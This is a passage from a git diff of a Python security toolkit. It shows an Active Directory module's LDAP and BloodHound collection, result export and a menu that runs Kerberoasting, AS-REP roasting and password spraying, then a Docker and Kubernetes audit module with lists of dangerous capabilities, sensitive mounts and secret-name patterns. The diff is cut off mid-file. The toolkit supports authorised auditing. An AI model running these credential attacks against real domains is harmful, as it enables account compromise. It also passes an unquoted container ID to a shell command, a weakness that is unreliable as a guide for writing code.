output_dir.glob('*.json'): + collection_stats['files'].append(str(f.name)) + for f in output_dir.glob('*.zip'): + collection_stats['files'].append(str(f.name)) + # Parse counts from output + for line in output.splitlines(): + if 'users' in line.lower(): + try: + collection_stats['users'] = int(''.join(c for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + if 'groups' in line.lower(): + try: + collection_stats['groups'] = int(''.join(c for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + if 'computers' in line.lower(): + try: + collection_stats['computers'] = int(''.join(c for c in line.split()[-1] if c.isdigit()) or 0) + except ValueError: + pass + + self.results['bloodhound'] = collection_stats + self._save_results('bloodhound', collection_stats) + return { + 'success': True, + 'stats': collection_stats, + 'message': f'BloodHound collection complete via {cmd_prefix}' + } + + # Fallback: manual LDAP collection into BloodHound-compatible JSON + collection_stats['method'] = 'manual_ldap' + + # Collect users + user_result = self.enumerate_users() + users_data = user_result.get('users', []) + collection_stats['users'] = len(users_data) + users_file = output_dir / f'users_{ts}.json' + with open(users_file, 'w') as f: + json.dump({'data': users_data, 'meta': {'type': 'users', 'count': len(users_data)}}, f, indent=2, default=str) + collection_stats['files'].append(users_file.name) + + # Collect groups + group_result = self.enumerate_groups() + groups_data = group_result.get('groups', []) + collection_stats['groups'] = len(groups_data) + groups_file = output_dir / f'groups_{ts}.json' + with open(groups_file, 'w') as f: + json.dump({'data': groups_data, 'meta': {'type': 'groups', 'count': len(groups_data)}}, f, indent=2, default=str) + collection_stats['files'].append(groups_file.name) + + # Collect computers + comp_result = self.enumerate_computers() + comps_data = comp_result.get('computers', []) + collection_stats['computers'] = len(comps_data) + comps_file = output_dir / f'computers_{ts}.json' + with open(comps_file, 'w') as f: + json.dump({'data': comps_data, 'meta': {'type': 'computers', 'count': len(comps_data)}}, f, indent=2, default=str) + collection_stats['files'].append(comps_file.name) + + # Domain info + domain_info = { + 'name': self.domain, + 'dn': self.domain_dn, + 'dcs': self.results.get('dcs', []), + 'trusts': self.results.get('trusts', []), + } + collection_stats['domains'] = 1 + domain_file = output_dir / f'domains_{ts}.json' + with open(domain_file, 'w') as f: + json.dump({'data': [domain_info], 'meta': {'type': 'domains', 'count': 1}}, f, indent=2, default=str) + collection_stats['files'].append(domain_file.name) + + self.results['bloodhound'] = collection_stats + self._save_results('bloodhound', collection_stats) + return { + 'success': True, + 'stats': collection_stats, + 'message': 'Manual LDAP collection complete (bloodhound-python not found — pip install bloodhound)' + } + + # ========== EXPORT ========== + + def export_results(self, fmt='json'): + """Export all collected enumeration and attack results.""" + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + + export_data = { + 'metadata': { + 'timestamp': ts, + 'domain': self.domain, + 'dc_host': self.dc_host, + 'format': fmt, + }, + 'results': {} + } + + for key, value in self.results.items(): + if value: # Only include non-empty results + export_data['results'][key] = value + + if fmt == 'json': + path = self.data_dir / f'ad_audit_export_{ts}.json' + with open(path, 'w') as f: + json.dump(export_data, f, indent=2, default=str) + return {'success': True, 'path': str(path), 'format': 'json'} + + elif fmt == 'csv': + import csv + files = [] + for key, data in export_data['results'].items(): + if isinstance(data, list) and data: + path = self.data_dir / f'ad_audit_{key}_{ts}.csv' + with open(path, 'w', newline='') as f: + if isinstance(data[0], dict): + writer = csv.DictWriter(f, fieldnames=data[0].keys()) + writer.writeheader() + for row in data: + # Flatten lists to strings + flat = {} + for k, v in row.items(): + flat[k] = '; '.join(v) if isinstance(v, list) else v + writer.writerow(flat) + else: + writer = csv.writer(f) + for item in data: + writer.writerow([item]) + files.append(str(path)) + return {'success': True, 'files': files, 'format': 'csv'} + + return {'success': False, 'message': f'Unsupported format: {fmt}'} + + +# ========== SINGLETON ========== + +_instance = None + + +def get_ad_audit(): + """Get or create singleton ADToolkit instance.""" + global _instance + if _instance is None: + _instance = ADToolkit() + return _instance + + +# ========== CLI MENU ========== + +def run(): + """CLI menu for Active Directory Audit module.""" + clear_screen() + display_banner() + ad = get_ad_audit() + + while True: + print(f"\n{Colors.BOLD}{Colors.RED}Active Directory Audit{Colors.RESET}") + print(f"{Colors.DIM}LDAP enumeration, Kerberoasting, password spray, ACL analysis{Colors.RESET}\n") + + # Connection status + if ad.is_connected(): + print(f" {Colors.GREEN}Connected:{Colors.RESET} {ad.dc_host} ({ad.domain}) as {ad.username or 'anonymous'}") + else: + print(f" {Colors.YELLOW}Not connected{Colors.RESET}") + + print(f"\n {Colors.CYAN}1{Colors.RESET} - Connect to DC") + print(f" {Colors.CYAN}2{Colors.RESET} - Enumerate Users") + print(f" {Colors.CYAN}3{Colors.RESET} - Enumerate Groups") + print(f" {Colors.CYAN}4{Colors.RESET} - Kerberoast") + print(f" {Colors.CYAN}5{Colors.RESET} - AS-REP Roast") + print(f" {Colors.CYAN}6{Colors.RESET} - Password Spray") + print(f" {Colors.CYAN}7{Colors.RESET} - ACL Analysis") + print(f" {Colors.CYAN}8{Colors.RESET} - BloodHound Collect") + print(f" {Colors.CYAN}9{Colors.RESET} - Enumerate Computers") + print(f" {Colors.CYAN}10{Colors.RESET} - Find Admin Accounts") + print(f" {Colors.CYAN}11{Colors.RESET} - Find Delegation") + print(f" {Colors.CYAN}12{Colors.RESET} - Export Results") + print(f" {Colors.CYAN}0{Colors.RESET} - Back\n") + + choice = input(f"{Colors.WHITE}Select> {Colors.RESET}").strip() + + if choice == '0': + if ad.is_connected(): + ad.disconnect() + break + + elif choice == '1': + print(f"\n{Colors.BOLD}Connect to Domain Controller{Colors.RESET}") + dc_host = input(f" DC Host/IP: ").strip() + domain = input(f" Domain (e.g. corp.local): ").strip() + username = input(f" Username (blank=anonymous): ").strip() or None + password = None + if username: + import getpass + password = getpass.getpass(f" Password: ") or None + ssl = input(f" Use SSL/LDAPS? (y/N): ").strip().lower() == 'y' + + if dc_host and domain: + result = ad.connect(dc_host, domain, username, password, ssl) + status = 'success' if result['success'] else 'error' + ad.print_status(result['message'], status) + else: + ad.print_status('DC host and domain are required', 'error') + + elif choice == '2': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating users...', 'info') + result = ad.enumerate_users() + count = result.get('count', 0) + ad.print_status(f'Found {count} users', 'success') + for u in result.get('users', [])[:20]: + flags = ', '.join(u.get('uac_flags', [])[:3]) + status_icon = '+' if u.get('enabled') else '-' + print(f" [{status_icon}] {u['username']:<25} {u.get('display_name', ''):<25} {flags}") + if count > 20: + print(f" ... and {count - 20} more") + + elif choice == '3': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating groups...', 'info') + result = ad.enumerate_groups() + count = result.get('count', 0) + ad.print_status(f'Found {count} groups', 'success') + for g in result.get('groups', [])[:20]: + print(f" {g['name']:<35} Members: {g['member_count']:<5} {g['scope']}") + if count > 20: + print(f" ... and {count - 20} more") + + elif choice == '4': + print(f"\n{Colors.BOLD}Kerberoast{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + user = input(f" Username [{ad.username or ''}]: ").strip() or ad.username + import getpass + pwd = getpass.getpass(f" Password: ") or ad.password + if dc and dom and user and pwd: + ad.print_status('Running Kerberoast...', 'info') + result = ad.kerberoast(dc, dom, user, pwd) + ad.print_status(result.get('message', ''), 'success' if result.get('count', 0) > 0 else 'warning') + for h in result.get('hashes', []): + print(f" {h[:80]}...") + else: + ad.print_status('All fields required', 'error') + + elif choice == '5': + print(f"\n{Colors.BOLD}AS-REP Roast{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + ul = input(f" User list (comma-separated, blank=auto): ").strip() + userlist = [u.strip() for u in ul.split(',')] if ul else None + if dc and dom: + ad.print_status('Running AS-REP Roast...', 'info') + result = ad.asrep_roast(dc, dom, userlist) + ad.print_status(result.get('message', ''), 'success' if result.get('count', 0) > 0 else 'warning') + for h in result.get('hashes', []): + print(f" {h[:80]}...") + else: + ad.print_status('DC and domain required', 'error') + + elif choice == '6': + print(f"\n{Colors.BOLD}Password Spray{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + ul = input(f" User list (comma-separated): ").strip() + import getpass + pwd = getpass.getpass(f" Password to spray: ") + proto = input(f" Protocol (ldap/smb) [ldap]: ").strip() or 'ldap' + if dc and dom and ul and pwd: + users = [u.strip() for u in ul.split(',')] + ad.print_status(f'Spraying {len(users)} users with protocol={proto}...', 'info') + result = ad.password_spray(users, pwd, dc, dom, proto) + ad.print_status( + f'Done: {result["success_count"]} success, ' + f'{result["failure_count"]} failed, ' + f'{result["lockout_count"]} lockouts', + 'success' + ) + for r in result.get('results', []): + color = Colors.GREEN if r['status'] == 'success' else (Colors.RED if r['status'] == 'lockout' else Colors.DIM) + print(f" {color}{r['username']:<25} {r['status']:<12} {r['message']}{Colors.RESET}") + else: + ad.print_status('All fields required', 'error') + + elif choice == '7': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Analyzing ACLs...', 'info') + result = ad.analyze_acls() + count = result.get('count', 0) + ad.print_status(f'Found {count} ACL findings', 'success') + for f in result.get('findings', []): + risk_color = Colors.RED if f['risk'] == 'Critical' else (Colors.YELLOW if f['risk'] == 'High' else Colors.DIM) + print(f" {risk_color}[{f['risk']}]{Colors.RESET} {f['target']}: {f['permission']}") + + elif choice == '8': + print(f"\n{Colors.BOLD}BloodHound Collection{Colors.RESET}") + dc = input(f" DC Host/IP [{ad.dc_host or ''}]: ").strip() or ad.dc_host + dom = input(f" Domain [{ad.domain or ''}]: ").strip() or ad.domain + user = input(f" Username [{ad.username or ''}]: ").strip() or ad.username + import getpass + pwd = getpass.getpass(f" Password: ") or ad.password + if dc and dom and user and pwd: + ad.print_status('Running BloodHound collection (this may take a while)...', 'info') + result = ad.bloodhound_collect(dc, dom, user, pwd) + ad.print_status(result.get('message', ''), 'success' if result.get('success') else 'error') + stats = result.get('stats', {}) + print(f" Users: {stats.get('users', 0)} Groups: {stats.get('groups', 0)} Computers: {stats.get('computers', 0)}") + print(f" Files: {', '.join(stats.get('files', []))}") + else: + ad.print_status('All fields required', 'error') + + elif choice == '9': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Enumerating computers...', 'info') + result = ad.enumerate_computers() + count = result.get('count', 0) + ad.print_status(f'Found {count} computers', 'success') + for c in result.get('computers', [])[:20]: + deleg = ' [UNCONSTRAINED DELEG]' if c.get('trusted_for_delegation') else '' + print(f" {c['name']:<25} {c.get('os', ''):<30} {c.get('dns_name', '')}{deleg}") + + elif choice == '10': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Finding admin accounts...', 'info') + result = ad.find_admin_accounts() + for grp in result.get('admins', []): + print(f"\n {Colors.BOLD}{grp['group']}{Colors.RESET} ({grp['count']} members)") + for m in grp.get('members', []): + status_icon = Colors.GREEN + '+' if m['enabled'] else Colors.RED + '-' + print(f" [{status_icon}{Colors.RESET}] {m['username']:<25} {m.get('display_name', '')}") + + elif choice == '11': + if not ad.is_connected(): + ad.print_status('Not connected — connect first', 'error') + continue + ad.print_status('Finding delegation configurations...', 'info') + uc = ad.find_unconstrained_delegation() + cc = ad.find_constrained_delegation() + print(f"\n {Colors.BOLD}Unconstrained Delegation:{Colors.RESET} {uc.get('count', 0)} servers") + for s in uc.get('servers', []): + print(f" {Colors.RED}[HIGH]{Colors.RESET} {s['name']} ({s.get('os', '')})") + print(f"\n {Colors.BOLD}Constrained Delegation:{Colors.RESET} {cc.get('count', 0)} servers") + for s in cc.get('servers', []): + print(f" [{s['risk']}] {s['name']} -> {', '.join(s.get('allowed_to_delegate_to', []))}") + + elif choice == '12': + fmt = input(f" Format (json/csv) [json]: ").strip() or 'json' + result = ad.export_results(fmt) + if result.get('success'): + ad.print_status(f'Exported to: {result.get("path", "") or ", ".join(result.get("files", []))}', 'success') + else: + ad.print_status(result.get('message', 'Export failed'), 'error') + + else: + ad.print_status('Invalid selection', 'warning') + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") diff --git a/modules/container_sec.py b/modules/container_sec.py new file mode 100644 index 0000000..70203a3 --- /dev/null +++ b/modules/container_sec.py @@ -0,0 +1,1482 @@ +"""AUTARCH Container Security + +Docker auditing, Kubernetes assessment, container image scanning, +escape detection, Dockerfile linting, and runtime monitoring. +""" + +DESCRIPTION = "Container security — Docker & Kubernetes auditing" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import sys +import json +import subprocess +import platform +import time +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + import shutil + + def find_tool(name): + return shutil.which(name) + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = WHITE = DIM = RESET = BOLD = '' + + def clear_screen(): + pass + + def display_banner(): + pass + + +# ── Dangerous Docker capabilities ─────────────────────────────────────────── + +DANGEROUS_CAPS = [ + 'SYS_ADMIN', 'NET_ADMIN', 'SYS_PTRACE', 'SYS_RAWIO', + 'DAC_OVERRIDE', 'FOWNER', 'NET_RAW', 'MKNOD', 'SYS_CHROOT', + 'AUDIT_WRITE', 'SETFCAP', 'MAC_OVERRIDE', 'MAC_ADMIN', + 'SYSLOG', 'DAC_READ_SEARCH', 'LINUX_IMMUTABLE', 'SYS_BOOT', + 'SYS_MODULE', 'SYS_TIME', 'KILL', +] + +SENSITIVE_MOUNTS = [ + '/var/run/docker.sock', '/run/docker.sock', + '/proc', '/sys', '/dev', '/etc/shadow', '/etc/passwd', + '/root', '/home', '/var/log', +] + +DEFAULT_SECCOMP_PROFILE = 'runtime/default' + +# ── Dockerfile Lint Rules ─────────────────────────────────────────────────── + +DOCKERFILE_RULES = { + 'DL001': {'severity': 'high', 'title': 'FROM uses :latest tag', + 'desc': 'Pin image versions for reproducible builds.'}, + 'DL002': {'severity': 'high', 'title': 'No USER directive', + 'desc': 'Container runs as root by default. Add a USER directive.'}, + 'DL003': {'severity': 'medium', 'title': 'ADD used instead of COPY', + 'desc': 'Use COPY for local files. ADD auto-extracts and supports URLs.'}, + 'DL004': {'severity': 'high', 'title': 'Secrets in ENV/ARG', + 'desc': 'Avoid passing secrets via ENV or ARG. Use build secrets.'}, + 'DL005': {'severity': 'low', 'title': 'Missing HEALTHCHECK', + 'desc': 'Add HEALTHCHECK for container orchestration readiness.'}, + 'DL006': {'severity': 'medium', 'title': 'apt-get without --no-install-recommends', + 'desc': 'Use --no-install-recommends to reduce image size.'}, + 'DL007': {'severity': 'low', 'title': 'Missing cache cleanup', + 'desc': 'Run apt-get clean / rm -rf /var/lib/apt/lists/* after install.'}, + 'DL008': {'severity': 'medium', 'title': 'EXPOSE all interfaces', + 'desc': 'Avoid EXPOSE with 0.0.0.0; bind to specific interfaces.'}, + 'DL009': {'severity': 'high', 'title': 'COPY / ADD of sensitive files', + 'desc': 'Avoid copying .env, credentials, or private keys into image.'}, + 'DL010': {'severity': 'medium', 'title': 'Using sudo in RUN', + 'desc': 'Avoid sudo in Dockerfiles. Use USER directive instead.'}, + 'DL011': {'severity': 'low', 'title': 'Multiple consecutive RUN commands', + 'desc': 'Chain RUN commands with && to reduce layers.'}, +} + +SECRET_PATTERNS = re.compile( + r'(password|secret|token|api_key|apikey|access_key|private_key|' + r'aws_secret|db_pass|database_url|auth_token)', + re.IGNORECASE +) + +SENSITIVE_FILE_PATTERNS = re.compile( + r'\.(pem|key|p12|pfx|env|credentials|htpasswd|pgpass)$', + re.IGNORECASE +) + + +# ── ContainerSecurity Class ───────────────────────────────────────────────── + +class ContainerSecurity: + """Docker and Kubernetes security auditing engine.""" + + _instance = None + + def __init__(self): + data = Path(str(get_data_dir())) / 'container_sec' + data.mkdir(parents=True, exist_ok=True) + self._data_dir = data + self._results_path = data / 'results.json' + self._results = { + 'docker_host': [], + 'container_audits': {}, + 'image_scans': {}, + 'dockerfile_lints': [], + 'k8s_audits': {}, + 'escape_checks': {}, + 'timestamp': None, + } + self._is_win = platform.system() == 'Windows' + + # ── helpers ────────────────────────────────────────────────────────────── + + def _run(self, cmd: str, timeout: int = 30) -> tuple: + """Run a shell command. Returns (success: bool, stdout: str).""" + try: + result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + def _run_json(self, cmd: str, timeout: int = 30) -> tuple: + """Run command expecting JSON output. Returns (success, parsed_data).""" + ok, raw = self._run(cmd, timeout=timeout) + if not ok: + return False, raw + try: + return True, json.loads(raw) + except (json.JSONDecodeError, ValueError): + return False, raw + + def _save_results(self): + self._results['timestamp'] = datetime.utcnow().isoformat() + try: + with open(self._results_path, 'w') as f: + json.dump(self._results, f, indent=2, default=str) + except Exception: + pass + + # ── tool checks ────────────────────────────────────────────────────────── + + def check_docker_installed(self) -> dict: + """Check if Docker CLI is available.""" + docker = find_tool('docker') + if not docker: + return {'installed': False, 'path': None, 'version': None} + ok, ver = self._run(f'"{docker}" --version') + return { + 'installed': True, + 'path': docker, + 'version': ver if ok else 'unknown', + } + + def check_kubectl_installed(self) -> dict: + """Check if kubectl CLI is available.""" + kubectl = find_tool('kubectl') + if not kubectl: + return {'installed': False, 'path': None, 'version': None, 'context': None} + ok, ver = self._run(f'"{kubectl}" version --client --short 2>/dev/null || "{kubectl}" version --client') + ctx_ok, ctx = self._run(f'"{kubectl}" config current-context 2>/dev/null') + return { + 'installed': True, + 'path': kubectl, + 'version': ver if ok else 'unknown', + 'context': ctx if ctx_ok else None, + } + + # ── Docker Host Audit ──────────────────────────────────────────────────── + + def audit_docker_host(self) -> list: + """Comprehensive Docker host security audit.""" + findings = [] + docker = find_tool('docker') + if not docker: + return [{'check': 'Docker CLI', 'severity': 'critical', + 'status': 'fail', 'detail': 'Docker not found on system'}] + + # 1. Daemon configuration + daemon_cfg_path = '/etc/docker/daemon.json' + if self._is_win: + daemon_cfg_path = os.path.expandvars(r'%ProgramData%\docker\config\daemon.json') + + daemon_cfg = {} + if os.path.isfile(daemon_cfg_path): + try: + with open(daemon_cfg_path) as f: + daemon_cfg = json.load(f) + findings.append({ + 'check': 'Daemon Config', + 'severity': 'info', + 'status': 'pass', + 'detail': f'Found {daemon_cfg_path}', + }) + except Exception as e: + findings.append({ + 'check': 'Daemon Config', + 'severity': 'medium', + 'status': 'warn', + 'detail': f'Cannot parse {daemon_cfg_path}: {e}', + }) + else: + findings.append({ + 'check': 'Daemon Config', + 'severity': 'medium', + 'status': 'warn', + 'detail': f'No daemon.json found at {daemon_cfg_path}', + }) + + # 2. Docker socket permissions (Linux only) + if not self._is_win: + sock = '/var/run/docker.sock' + if os.path.exists(sock): + try: + stat = os.stat(sock) + mode = oct(stat.st_mode)[-3:] + world_rw = mode[2] in ('6', '7', '2', '3') + if world_rw: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'high', + 'status': 'fail', + 'detail': f'{sock} is world-accessible (mode {mode}). Restrict to docker group.', + }) + else: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'info', + 'status': 'pass', + 'detail': f'{sock} permissions: {mode}', + }) + except Exception: + findings.append({ + 'check': 'Docker Socket Permissions', + 'severity': 'low', + 'status': 'warn', + 'detail': 'Cannot stat docker socket', + }) + + # 3. TLS configuration + tls_verify = daemon_cfg.get('tls', False) or daemon_cfg.get('tlsverify', False) + if tls_verify: + findings.append({ + 'check': 'TLS Configuration', + 'severity': 'info', + 'status': 'pass', + 'detail': 'Docker daemon TLS is enabled', + }) + else: + findings.append({ + 'check': 'TLS Configuration', + 'severity': 'medium', + 'status': 'warn', + 'detail': 'Docker daemon TLS is not configured in daemon.json', + }) + + # 4. User namespace remapping + userns = daemon_cfg.get('userns-remap', '') + if userns: + findings.append({ + 'check': 'User Namespace Remapping', + 'severity': 'info', + 'status': 'pass', + 'detail': f'Remapped to: {userns}', + }) + else: + findings.append({ + 'check': 'User Namespace Remapping', + 'severity': 'medium', + 'status': 'warn', + 'detail': 'Not enabled. Containers run as host UID 0.', + }) + + # 5. Content trust + content_trust = os.environ.get('DOCKER_CONTENT_TRUST', '0') + if content_trust == '1': + findings.append({ + 'check': 'Content Trust (DCT)', + 'severity': 'info', + 'status': 'pass', + 'detail': 'DOCKER_CONTENT_TRUST=1 — signed images enforced', + }) + else: + findings.append({ + 'check': 'Content Trust (DCT)', + 'severity': 'low', + 'status': 'warn', + 'detail': 'DOCKER_CONTENT_TRUST not set. Unsigned images accepted.', + }) + + # 6. Live restore + live_restore = daemon_cfg.get('live-restore', False) + if live_restore: + findings.append({ + 'check': 'Live Restore', + 'severity': 'info', + 'status': 'pass', + 'detail': 'Containers survive daemon restarts', + }) + else: + findings.append({ + 'check': 'Live Restore', + 'severity': 'low', + 'status': 'warn', + 'detail': 'live-restore not enabled in daemon.json', + }) + + # 7. Logging driver + log_driver = daemon_cfg.get('log-driver', 'json-file') + log_opts = daemon_cfg.get('log-opts', {}) + max_size = log_opts.get('max-size', 'unlimited') + findings.append({ + 'check': 'Logging Driver', + 'severity': 'low' if log_driver == 'json-file' and max_size == 'unlimited' else 'info', + 'status': 'warn' if max_size == 'unlimited' else 'pass', + 'detail': f'Driver: {log_driver}, max-size: {max_size}', + }) + + # 8. Docker info — check swarm, runtimes + ok, info_raw = self._run(f'"{docker}" info --format "{{{{json .}}}}"') + if ok: + try: + info = json.loads(info_raw) + # Check default runtime + rt = info.get('DefaultRuntime', 'runc') + findings.append({ + 'check': 'Default Runtime', + 'severity': 'info', + 'status': 'pass' if rt in ('runc', 'crun') else 'info', + 'detail': f'Runtime: {rt}', + }) + # Swarm mode + swarm = info.get('Swarm', {}) + swarm_active = swarm.get('LocalNodeState', 'inactive') == 'active' + if swarm_active: + findings.append({ + 'check': 'Swarm Mode', + 'severity': 'info', + 'status': 'info', + 'detail': 'Swarm is active. Ensure manager auto-lock is enabled.', + }) + except (json.JSONDecodeError, ValueError): + pass + + self._results['docker_host'] = findings + self._save_results() + return findings + + # ── Container Listing / Inspection ─────────────────────────────────────── + + def list_containers(self, all: bool = True) -> list: + """List Docker containers.""" + docker = find_tool('docker') + if not docker: + return [] + + flag = '-a' if all else '' + fmt = '{{json .}}' + ok, raw = self._run(f'"{docker}" ps {flag} --format "{fmt}"') + if not ok: + return [] + + containers = [] + for line in raw.splitlines(): + line = line.strip() + if not line: + continue + try: + c = json.loads(line) + containers.append({ + 'id': c.get('ID', ''), + 'name': c.get('Names', ''), + 'image': c.get('Image', ''), + 'status': c.get('Status', ''), + 'ports': c.get('Ports', ''), + 'created': c.get('CreatedAt', ''), + 'state': c.get('State', ''), + }) + except (json.JSONDecodeError, ValueError): + continue + return containers + + def inspect_container(self, container_id: str) -> dict: + """Inspect a container and extract security-relevant config.""" + docker = find_tool('docker') + if not docker: + return {'error': 'Docker not found'} + + ok, data = self._run_json(f'"{docker}" inspect {container_id}') + if not ok or not isinstance(data, list) or len(data) == 0: + return {'error': f'Cannot inspect container {container_id}'} + + info = data[0] + host_cfg = info.get('HostConfig', {}) + cfg = info.get('Config', {}) + + # Capabilities + cap_add = host_cfg.get('CapAdd') or [] + cap_drop = host_cfg.get('CapDrop') or [] + + # Mounts + mounts = [] + for m in info.get('Mounts', []): + mounts.append({ + 'source': m.get('Source', ''), + 'destination': m.get('Destination', ''), + 'mode': m.get('Mode', ''), + 'rw': m.get('RW', True), + 'type': m.get('Type', ''), + }) + + # Security options + sec_opts = host_cfg.get('SecurityOpt') or [] + + return { + 'id': info.get('Id', '')[:12], + 'name': info.get('Name', '').lstrip('/'), + 'image': cfg.get('Image', ''), + 'privileged': host_cfg.get('Privileged', False), + 'cap_add': cap_add, + 'cap_drop': cap_drop, + 'mounts': mounts, + 'network_mode': host_cfg.get('NetworkMode', ''), + 'user': cfg.get('User', '') or 'root', + 'pid_mode': host_cfg.get('PidMode', ''), + 'ipc_mode': host_cfg.get('IpcMode', ''), + 'read_only_rootfs': host_cfg.get('ReadonlyRootfs', False), + 'security_opt': sec_opts, + 'memory_limit': host_cfg.get('Memory', 0), + 'cpu_shares': host_cfg.get('CpuShares', 0), + 'pids_limit': host_cfg.get('PidsLimit', 0), + 'restart_policy': host_cfg.get('RestartPolicy', {}).get('Name', ''), + 'env': cfg.get('Env', []), + } + + # ── Container Security Audit ───────────────────────────────────────────── + + def audit_container(self, container_id: str) -> dict: + """Full security audit of a running container.""" + info = self.inspect_container(container_id) + if 'error' in info: + return info + + findings = [] + passed = 0 + total = 0 + + def check(name, ok, detail='', severity='medium'): + nonlocal passed, total + total += 1 + if ok: + passed += 1 + findings.append({ + 'check': name, + 'status': 'pass' if ok else 'fail', + 'severity': severity if not ok else 'info', + 'detail': detail, + }) + + # 1. Privileged mode + check('Privileged Mode', + not info['privileged'], + 'Container is running in privileged mode!' if info['privileged'] + else 'Not privileged', + severity='critical') + + # 2. Dangerous capabilities + dangerous_found = [c for c in info['cap_add'] if c in DANGEROUS_CAPS] + check('Capabilities', + len(dangerous_found) == 0, + f'Dangerous capabilities added: {", ".join(dangerous_found)}' if dangerous_found + else f'No dangerous capabilities ({len(info["cap_drop"])} dropped)', + severity='high') + + # 3. Sensitive mounts + sensitive_found = [] + for m in info['mounts']: + for s in SENSITIVE_MOUNTS: + if m['destination'].startswith(s) or m['source'].startswith(s): + sensitive_found.append(f'{m["source"]} -> {m["destination"]}') + break + check('Sensitive Mounts', + len(sensitive_found) == 0, + f'Sensitive paths mounted: {"; ".join(sensitive_found)}' if sensitive_found + else 'No sensitive host paths mounted', + severity='high') + + # 4. Running as root + check('User', + info['user'] not in ('', 'root', '0'), + f'Running as: {info["user"]}' if info['user'] not in ('', 'root', '0') + else 'Running as root. Use USER directive.', + severity='medium') + + # 5. Read-only root filesystem + check('Read-only Rootfs', + info['read_only_rootfs'], + 'Root filesystem is read-only' if info['read_only_rootfs'] + else 'Root filesystem is writable. Consider --read-only.', + severity='low') + + # 6. Resource limits — memory + check('Memory Limit', + info['memory_limit'] > 0, + f'Memory limit: {info["memory_limit"] // (1024*1024)}MB' if info['memory_limit'] > 0 + else 'No memory limit set. Container can exhaust host memory.', + severity='medium') + + # 7. Resource limits — PID + pids = info['pids_limit'] + has_pids = pids is not None and pids > 0 and pids != -1 + check('PID Limit', + has_pids, + f'PID limit: {pids}' if has_pids + else 'No PID limit. Fork bomb possible.', + severity='low') + + # 8. Seccomp profile + seccomp_set = any('seccomp' in opt for opt in info['security_opt']) + no_seccomp = any('seccomp=unconfined' in opt for opt in info['security_opt']) + check('Seccomp Profile', + seccomp_set and not no_seccomp, + 'Seccomp profile disabled (unconfined)!' if no_seccomp + else ('Custom seccomp profile applied' if seccomp_set + else 'Default seccomp profile (OK for Docker default)'), + severity='high' if no_seccomp else 'low') + + # 9. AppArmor profile + apparmor_set = any('apparmor' in opt for opt in info['security_opt']) + no_apparmor = any('apparmor=unconfined' in opt for opt in info['security_opt']) + check('AppArmor Profile', + not no_apparmor, + 'AppArmor disabled (unconfined)!' if no_apparmor + else ('AppArmor profile applied' if apparmor_set + else 'No explicit AppArmor profile (using Docker default)'), + severity='medium' if no_apparmor else 'low') + + # 10. Network mode + check('Network Mode', + info['network_mode'] not in ('host',), + f'Network mode: {info["network_mode"]}', + severity='high' if info['network_mode'] == 'host' else 'info') + + # 11. PID mode + check('PID Mode', + info['pid_mode'] != 'host', + 'PID namespace shared with host!' if info['pid_mode'] == 'host' + else f'PID mode: {info["pid_mode"] or "container (isolated)"}', + severity='high') + + # 12. Secrets in environment + env_secrets = [] + for e in info.get('env', []): + key = e.split('=', 1)[0] if '=' in e else e + if SECRET_PATTERNS.search(key): + env_secrets.append(key) + check('Environment Secrets', + len(env_secrets) == 0, + f'Possible secrets in ENV: {", ".join(env_secrets)}' if env_secrets + else 'No obvious secrets in environment variables', + severity='medium') + + score = int((passed / total) * 100) if total > 0 else 0 + + result = { + 'container_id': container_id, + 'name': info.get('name', ''), + 'image': info.get('image', ''), + 'score': score, + 'passed': passed, + 'total': total, + 'findings': findings, + } + + self._results['container_audits'][container_id] = result + self._save_results() + return result + + # ── Image Operations ───────────────────────────────────────────────────── + + def list_images(self) -> list: + """List local Docker images.""" + docker = find_tool('docker') + if not docker: + return [] + + fmt = '{{json .}}' + ok, raw = self._run(f'"{docker}" images --format "{fmt}"') + if not ok: + return [] + + images = [] + for line in raw.splitlines(): + line = line.strip() + if not line: + continue + try: + img = json.loads(line) + images.append({ + 'id': img.get('ID', ''), + 'repo': img.get('Repository', ''), + 'tag': img.get('Tag', ''), + 'size': img.get('Size', ''), + 'created': img.get('CreatedAt', img.get('CreatedSince', '')), + }) + except (json.JSONDecodeError, ValueError): + continue + return images + + def scan_image(self, image_name: str) -> dict: + """Scan a container image for CVEs using trivy or grype.""" + # Try trivy first + trivy = find_tool('trivy') + if trivy: + ok, raw = self._run( + f'"{trivy}" image --format json --severity CRITICAL,HIGH,MEDIUM,LOW ' + f'--quiet "{image_name}"', + timeout=120 + ) + if ok: + return self._parse_trivy(raw, image_name) + + # Fallback to grype + grype = find_tool('grype') + if grype: + ok, raw = self._run( + f'"{grype}" "{image_name}" -o json --quiet', + timeout=120 + ) + if ok: + return self._parse_grype(raw, image_name) + + return { + 'image': image_name, + 'scanner': None, + 'error': 